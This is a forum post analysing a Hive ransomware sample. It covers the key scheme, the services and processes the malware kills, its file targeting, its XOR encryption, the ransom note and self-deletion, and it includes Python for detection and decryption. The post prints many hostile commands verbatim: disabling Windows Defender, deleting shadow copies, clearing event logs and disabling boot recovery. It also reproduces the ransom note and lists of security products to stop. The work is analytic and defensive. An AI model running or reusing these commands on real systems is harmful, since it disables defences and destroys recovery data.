Potato posted on 2022-5-5 10:52

Hive Ransomware Sample Analysis

Related reading: Hive ransomware family details


Overview
The Hive ransomware family was first discovered in June 2021 and has remained very active since. This Hive sample likewise uses an asymmetric + symmetric encryption scheme, but the symmetric algorithm used in the file-encryption stage differs from mainstream choices: instead of a standard symmetric cipher such as AES, DES, Salsa20 or RC4, Hive encrypts files with a custom stream-cipher construction.
Code Analysis
The current Hive sample is compiled from Go, and a large number of function names are string-obfuscated to make the code harder to analyse.
Hive enables the corresponding features through command-line arguments; the arguments supported by this sample and their meanings are shown in the table below:


1. Key generation & export
Hive encrypts target files with a custom symmetric algorithm. It is a stream cipher whose keystream is 0x100000 bytes (1 MB) of random data.

The asymmetric algorithm is RSA-4096, which is used to encrypt the file-encryption keystream. The public key is embedded in the malware, in the format shown in the figure below:

After RSA public-key encryption the keystream grows from 0x100000 bytes to 0x12b880 bytes, and the encrypted data is written to the root directory of every target drive. The file name is:
<Custom_Base64Encode ( SHA256 ( 0x100000-byte keystream ) + '\xFF' )>.key.1aevj
Here .1aevj is the encrypted-file extension, which may differ between Hive samples. When Base64-encoding the data, this sample uses a modified alphabet: the original + and / are replaced with - and _:

Example file name: C:\uW5YfSCYFaEGcSI1T4nJnKTE8tFLwv2A6Sc8sUI-Vnf_.key.1aevj
2. Terminating target services and processes & deleting shadow copies
Hive matches service names, process names, file names and file types with regular expressions. If no corresponding argument is given at startup, the default configuration is used.
The list of services to stop is:
(?i:acronis|AcrSch2Svc|Antivirus|ARSM|AVP|backup|bedbg|CAARCUpdateSvc|CASAD2DWebSvc|ccEvtMgr|ccSetMgr|Culserver|dbeng8|dbsrv12|DCAgent|DefWatch|EhttpSrv|ekrn|Enterprise Client Service|EPSecurityService|EPUpdateService|EraserSvc11710|EsgShKernel|ESHASRV|FA_Scheduler|firebird|IISAdmin|IMAP4Svc|Intuit|KAVFS|KAVFSGT|kavfsslp|klnagent|macmnsvc|masvc|MBAMService|MBEndpointAgent|McAfee|McShield|McTaskManager|memtas|mepocs|mfefire |mfemms|mfevtp|MMS|MsDtsServer|MsDtsServer100|MsDtsServer110|msexchange|msmdsrv|MSOLAP|MVArmor|MVarmor64|NetMsmqActivator|ntrtscan|oracle|PDVFSService|POP3Svc|postgres|QBCFMonitorService|QBFCService|QBIDPService|redis|report|RESvc|RTVscan|sacsvr|SamSs|SAVAdminService|SavRoam|SAVService|SDRSVC|SepMasterService|ShMonitor|Smcinst|SmcService|SMTPSvc|SNAC|SntpService|sophos|sql|SstpSvc|stc_raw_agent|^svc|swi_|Symantec|TmCCSF|tmlisten|tomcat|TrueKey|UI0Detect|veeam|vmware|vss|W3Svc|wbengine|WebClient|wrapper|WRSVC|WSBExchange|YooIT|zhudongfangyu|Zoolz)
The list of target processes to terminate is:
(?i:agntsvc|sql|CNTAoSMgr|dbeng50|dbsnmp|encsvc|excel|firefoxconfig|infopath|mbamtray|msaccess|mspub|mydesktop|Ntrtscan|ocautoupds|ocomm|ocssd|onenote|oracle|outlook|PccNTMon|powerpnt|sqbcoreservice|steam|synctime|tbirdconfig|thebat|thunderbird|tmlisten|visio|word|xfssvccon|zoolz)
For each matched service, Hive stops it via net.exe and disables its automatic start via sc.exe. It also runs command lines that disable Windows Defender and other anti-virus functionality to weaken host defences, deletes volume shadow copies, and disables boot-time recovery:
net.exe stop <target service name> /y
sc.exe config <target service name> start= disabled
reg.exe add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
reg.exe delete HKLM\Software\Policies\Microsoft\Windows Defender /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine /v MpEnablePus /t REG_DWORD /d 0 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
reg.exe add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
reg.exe add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
schtasks.exe /Change /TN Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cleanup /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan /Disable
schtasks.exe /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Verification /Disable
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Windows Defender /f
reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Windows Defender /f
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
reg.exe delete HKCR\*\shellex\ContextMenuHandlers\EPP /f
reg.exe delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
reg.exe delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
reg.exe add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
vssadmin.exe delete shadows /all /quiet
wevtutil.exe cl system
wevtutil.exe cl security
wevtutil.exe cl application
wmic.exe SHADOWCOPY /nointeractive
wmic.exe shadowcopy delete
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
cmd.exe /c C:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -All
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
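As an added example (not part of the original post), the following Python turns the command list above into detection rules and runs them over a few constructed process-creation events. The event format, host names, parent PIDs and the alert threshold are assumptions; the point is that several of these behaviours from one parent process within seconds is a much stronger signal than any single command.

```python
import re
from collections import defaultdict

# Detection rules derived from the command lines listed above: (label, pattern over the command line)
RULES = [
    ("defender_policy_tamper", r"reg\.exe\s+(add|delete)\s+HKLM\\Software\\Policies\\Microsoft\\Windows Defender"),
    ("defender_service_disabled", r"reg\.exe\s+add\s+HKLM\\System\\CurrentControlSet\\Services\\(WdBoot|WdFilter|WdNisDrv|WdNisSvc|WinDefend|SecurityHealthService)\s+/v\s+Start\s+.*\s+/d\s+4\b"),
    ("defender_task_disabled", r"schtasks\.exe\s+/Change\s+/TN\s+Microsoft\\Windows\\(Windows Defender|ExploitGuard)\\.*\s+/Disable"),
    ("defender_cmdlet", r"(MpCmdRun\.exe\s+-RemoveDefinitions|Set-MpPreference\s+-Disable\w+\s+\$true)"),
    ("shadow_copy_deleted", r"(vssadmin\.exe\s+delete\s+shadows|wmic\.exe\s+shadowcopy\s+delete)"),
    ("event_log_cleared", r"wevtutil\.exe\s+cl\s+(system|security|application)\b"),
    ("boot_recovery_disabled", r"bcdedit\.exe\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("service_stop_chain", r"(net\.exe\s+stop\s+\S+\s+/y|sc\.exe\s+config\s+\S+\s+start=\s*disabled)"),
]
COMPILED = [(label, re.compile(p, re.IGNORECASE)) for label, p in RULES]
ALERT_THRESHOLD = 3  # distinct categories from one parent process before alerting (assumed value)

# Assumed event format: "<ts> host=<name> ppid=<parent pid> cmd=<command line>"
EVENT = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+ppid=(?P<ppid>\d+)\s+cmd=(?P<cmd>.*)$")

def classify(cmdline: str) -> list:
    """Labels of every rule the command line matches (empty for benign lines)."""
    return [label for label, rx in COMPILED if rx.search(cmdline)]

def triage(lines) -> dict:
    """Group rule hits per (host, parent pid); return those at or above the threshold."""
    hits = defaultdict(set)
    for line in lines:
        m = EVENT.match(line)
        if m:
            hits[(m["host"], int(m["ppid"]))].update(classify(m["cmd"]))
    return {key: sorted(labels) for key, labels in hits.items() if len(labels) >= ALERT_THRESHOLD}

SAMPLE_EVENTS = [  # constructed events, not real telemetry; WS02 has only one isolated hit
    "2022-05-05T10:52:01Z host=WS01 ppid=4412 cmd=net.exe stop veeam /y",
    "2022-05-05T10:52:01Z host=WS01 ppid=4412 cmd=sc.exe config veeam start= disabled",
    "2022-05-05T10:52:02Z host=WS01 ppid=4412 cmd=reg.exe add HKLM\\Software\\Policies\\Microsoft\\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f",
    "2022-05-05T10:52:02Z host=WS01 ppid=4412 cmd=reg.exe add HKLM\\System\\CurrentControlSet\\Services\\WinDefend /v Start /t REG_DWORD /d 4 /f",
    "2022-05-05T10:52:03Z host=WS01 ppid=4412 cmd=vssadmin.exe delete shadows /all /quiet",
    "2022-05-05T10:52:03Z host=WS01 ppid=4412 cmd=wevtutil.exe cl security",
    "2022-05-05T10:52:03Z host=WS01 ppid=4412 cmd=bcdedit.exe /set {default} recoveryenabled no",
    "2022-05-05T11:00:00Z host=WS02 ppid=900 cmd=reg.exe add HKCU\\Software\\Contoso\\App /v Theme /t REG_SZ /d dark /f",
    "2022-05-05T11:01:00Z host=WS02 ppid=900 cmd=vssadmin.exe delete shadows /all /quiet",
]
```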
3. Searching for files to encrypt
Target files are searched in three kinds of locations: fixed drives, removable drives and network resources. Each enumerated file path, file name and extension is matched against the regular expression below; anything that matches is skipped:
(?i:C:\\Windows|\.(?:386|adv|ani|bat|bin|cab|cmd|com|cpl|cur|deskthemepack|diagcab|diagcfg|diagpkg|dll|drv|exe|hlp|hrmlog|hta|icl|icns|ico|ics|idx|ini|key|lnk|lock|log|mod|mpa|mp3|msc|msi|msp|msstyles|msu|nls|nomedia|ocx|prf|ps1|rom|rtp|scr|shs|spl|sys|theme|themepack|url|wpx)$|(?:autorun\.inf|bootfont\.bin|boot\.ini|bootsect\.bak|desktop\.ini|iconcache\.db|ntldr|ntuser\.dat|ntuser\.dat\.log|ntuser\.ini|thumbs\.db)$|\\(\$recycle\.bin|\$windows\.~bt|\$windows\.~ws|All users|appdata|application data|boot|google|intel|Microsoft|mozilla|Mozilla|Msbuild|msocache|perflogs|system volume information|tor browser|windows|Windows nt|windows\.old)\\|(\$\\Windows\\|\\ADMIN\$|\\IPC\$)|(?:^$))
4. File encryption method
As mentioned above, Hive encrypts files with the randomly generated 0x100000-byte keystream. This keystream is used for all encryption operations of the current Hive process, mainly through XOR.
For each file, two 8-byte random values are generated, each shifted right by 0x1F bits and then reduced modulo a constant, giving two pointers, Pos1 and Pos2, to offsets in the keystream (KeyStream). The two keystream bytes are XORed together and the result is XORed with the file content read for encryption (the decryption algorithm is appended at the end of this post; the encryption algorithm is identical).


How much of each file is encrypted depends on its size. Hive uses interval encryption: from the target file size it computes an offset increment SkipOffset and an interval read count SliceCount. Starting at the beginning of the file, it encrypts 0x1000 (4 KB) bytes, then advances the file pointer by SkipOffset, and repeats until the number of jumps reaches SliceCount. For very large files SliceCount is capped at 25, so at most 100 KB of each file is encrypted. Possibly to avoid encrypting only meaningless header data in large files, once the jump count reaches 25 the data is read from the end of the file instead. Every encrypted segment is written back at its original offset.



The encrypted file is renamed as follows:
<Custom_Base64Encode ( SHA256 ( 0x100000-byte keystream ) + '\xFF' + Pos1 + Pos2 + '\x34' )>.1aevj
Example: test.sql.D6_MK7wCTzIThl7FO1Xsni-0dH__g8xSJWXphhN8Fhn_VibYBDtJ8JI0.1aevj

5. Data wiping
After all files have been encrypted, Hive wipes any keystream data that may remain by clearing the memory of the current process.

In addition, the program deletes files named temp<%d>.swap.1aevj in the root directory of each target drive, where %d increments from 0; no such files were found during analysis, however.
6. Ransom note
Hive drops a ransom note named Ko7n_HOW_TO_DECRYPT.txt in every encrypted directory; the Login and Password in it are hard-coded. After dropping the notes, it opens the note on the C: drive with notepad to alert the victim.
Your network has been breached and all data were encrypted.
Personal data, financial reports and important documents are ready to disclose.

To decrypt all the data and to prevent exfiltrated files to be disclosed at
http://hiveleakdbtnp76ulyhi52eag ... 34gd2nekazyd.onion/
you will need to purchase our decryption software.

Please contact our sales department at:

   http://hivecust6vhekztbqgdnkks64 ... dp57zoq3ooqd.onion/

      Login:    *****
      Password: *****

To get an access to .onion websites download and install Tor Browser at:
   https://www.torproject.org/ (Tor Browser is not related to us)


Follow the guidelines below to avoid losing your data:

- Do not modify, rename or delete *.key.1aevj files. Your data will be
   undecryptable.
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business.
   They simply won't allow you to pay. As a result you will lose everything.
- Do not hire a recovery company. They can't decrypt without the key.
   They also don't care about your business. They believe that they are
   good negotiators, but it is not. They usually fail. So speak for yourself.
- Do not reject to purchase. Exfiltrated files will be publicly disclosed.
7. Self-deletion
After all of the above steps, the program runs the following command to remove itself:
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del <self_path>
Decryption algorithm
Note that the decryption algorithm below requires the original keystream, i.e. the plaintext of the RSA-encrypted data stored in the .key file.
import re
import struct
import hashlib
from base64 import b64decode

xorstream = b'......'  # the 0x100000-byte keystream, recovered by RSA-decrypting the .key.1aevj file
ciphertext = b'......' # the encrypted segments read from the target file, in order
filename = 'test.txt.pn8sy0cwfprbSDAxLQm7m1WiYiWyCa3EiCLh2QBceKn_om7fld75sDM0.1aevj'  # example name

def decrypt(idx0, idx1):
    # The moduli leave a 0x19000-byte (100 KB, the per-file maximum) window after pos0
    # and a 0xc00-byte window after pos1; the second window wraps (inferred from the constants).
    pos0 = idx0 % 0xe7000
    pos1 = idx1 % 0xff400
    plaintext = bytearray()
    for i in range(len(ciphertext)):
        plaintext.append(ciphertext[i] ^ xorstream[pos0 + i % 0x19000] ^ xorstream[pos1 + i % 0xc00])
    return bytes(plaintext)

info = re.search(r'\.([A-Za-z0-9_-]+)\.1aevj', filename, flags=re.IGNORECASE)
if info:
    b64Str = info.group(1).replace('-', '+').replace('_', '/')
    k = b64decode(b64Str)  # 42 bytes: SHA256(keystream) + '\xFF' + Pos1 + Pos2 + '\x34'
    assert k[:32] == hashlib.sha256(xorstream).digest(), 'keystream does not belong to this file'
    plaintext = decrypt(struct.unpack('<I', k[33:37])[0], struct.unpack('<I', k[37:41])[0])
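As an added, self-contained example (not the author's code), the following Python ties together sections 1 and 4 and the decryption routine above: the custom Base64 alphabet, the .key and encrypted-file naming, and the two-pointer XOR, with a SHA-256 check that confirms a recovered keystream belongs to a given file before decrypting. The keystream is a constructed 1 MiB value, and the wrap of the second pointer within a 0xC00-byte window is inferred from the moduli 0xe7000 and 0xff400 rather than stated in the post.

```python
import base64, hashlib, re, struct

KEYSTREAM_LEN = 0x100000                 # 1 MiB random keystream, as in the sample
KS1_WINDOW = KEYSTREAM_LEN - 0xe7000     # 0x19000 = 100 KiB, the per-file encryption cap
KS2_WINDOW = KEYSTREAM_LEN - 0xff400     # 0xC00; second pointer wraps here (inferred, see lead-in)
EXT = ".1aevj"

def hive_b64(data: bytes) -> str:
    # Hive swaps '+' '/' for '-' '_', i.e. URL-safe Base64; the 33/42-byte names need no padding
    return base64.urlsafe_b64encode(data).decode().rstrip("=")

def hive_b64_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def key_file_name(keystream: bytes) -> str:
    return hive_b64(hashlib.sha256(keystream).digest() + b"\xff") + ".key" + EXT

def encrypted_file_name(original: str, keystream: bytes, idx1: int, idx2: int) -> str:
    tail = hashlib.sha256(keystream).digest() + b"\xff" + struct.pack("<II", idx1, idx2) + b"\x34"
    return f"{original}.{hive_b64(tail)}{EXT}"

def parse_encrypted_name(name: str):
    """Return (original name, keystream SHA-256, idx1, idx2) from a Hive-renamed file."""
    m = re.fullmatch(r"(.*)\.([A-Za-z0-9_-]+)" + re.escape(EXT), name, flags=re.IGNORECASE)
    if not m:
        raise ValueError("not a Hive-renamed file")
    tail = hive_b64_decode(m.group(2))
    if len(tail) != 42 or tail[32] != 0xff or tail[41] != 0x34:
        raise ValueError("unexpected name layout")
    idx1, idx2 = struct.unpack("<II", tail[33:41])
    return m.group(1), tail[:32], idx1, idx2

def xor_stream(data: bytes, keystream: bytes, idx1: int, idx2: int) -> bytes:
    """Hive's per-file XOR; the same call encrypts and decrypts."""
    pos1, pos2 = idx1 % 0xe7000, idx2 % 0xff400
    return bytes(b ^ keystream[pos1 + i % KS1_WINDOW] ^ keystream[pos2 + i % KS2_WINDOW]
                 for i, b in enumerate(data))

def decrypt_file(name: str, data: bytes, keystream: bytes):
    """Check that the keystream belongs to this file (SHA-256 in the name), then decrypt."""
    original, digest, idx1, idx2 = parse_encrypted_name(name)
    if digest != hashlib.sha256(keystream).digest():
        raise ValueError("keystream does not match this file's .key fingerprint")
    return original, xor_stream(data, keystream, idx1, idx2)

# Constructed demo keystream (deterministic stand-in for the sample's random data)
DEMO_KEYSTREAM = hashlib.shake_256(b"constructed demo keystream").digest(KEYSTREAM_LEN)
```

Parsing the example name from section 4 recovers the original name test.sql and the two pointer values, which is also how an encrypted file can be matched to the .key file whose SHA-256 prefix it carries.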